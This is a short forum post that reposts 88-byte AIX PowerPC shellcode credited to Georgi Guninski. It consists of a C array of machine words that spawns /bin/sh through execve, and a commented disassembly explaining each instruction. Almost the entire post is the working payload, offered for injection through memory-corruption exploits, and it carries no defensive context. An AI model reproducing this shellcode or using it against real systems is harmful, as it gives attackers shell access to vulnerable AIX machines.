Aix execve /bin/sh 88 bytes
[code]<br /><pre>/*<br /> * Aix<br /> * execve() of /bin/sh Georgi Guninski (guninski@hotmail.com)<br /> */<br /><br />unsigned int code[]={<br /> 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,<br /> 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,<br /> 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,<br /> 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,<br /> 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,<br /> 0x7c0903a6 , 0x4e800420, 0x0<br />};<br /><br />/* disassembly<br /> 7c0802a6 mfspr r0,LR<br /> 9421fbb0 stu SP,-1104(SP) --get stack<br /> 90010458 st r0,1112(SP)<br /> 3c60f019 cau r3,r0,0xf019 --CTR<br /> 60632c48 lis r3,r3,11336 --CTR<br /> 90610440 st r3,1088(SP)<br /> 3c60d002 cau r3,r0,0xd002 --TOC<br /> 60634c0c lis r3,r3,19468 --TOC<br /> 90610444 st r3,1092(SP)<br /> 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'<br /> 6063696e lis r3,r3,26990<br /> 90610438 st r3,1080(SP)<br /> 3c602f73 cau r3,r0,0x2f73<br /> 60636801 lis r3,r3,26625<br /> 3863ffff addi r3,r3,-1<br /> 9061043c st r3,1084(SP) --terminate with 0<br /> 30610438 lis r3,SP,1080<br /> 7c842278 xor r4,r4,r4 --argv=NULL<br /> 80410440 lwz RTOC,1088(SP)<br /> 80010444 lwz r0,1092(SP) --jump<br /> 7c0903a6 mtspr CTR,r0<br /> 4e800420 bctr --jump<br />*/<br /></pre><br />[/code]<br />页:
[1]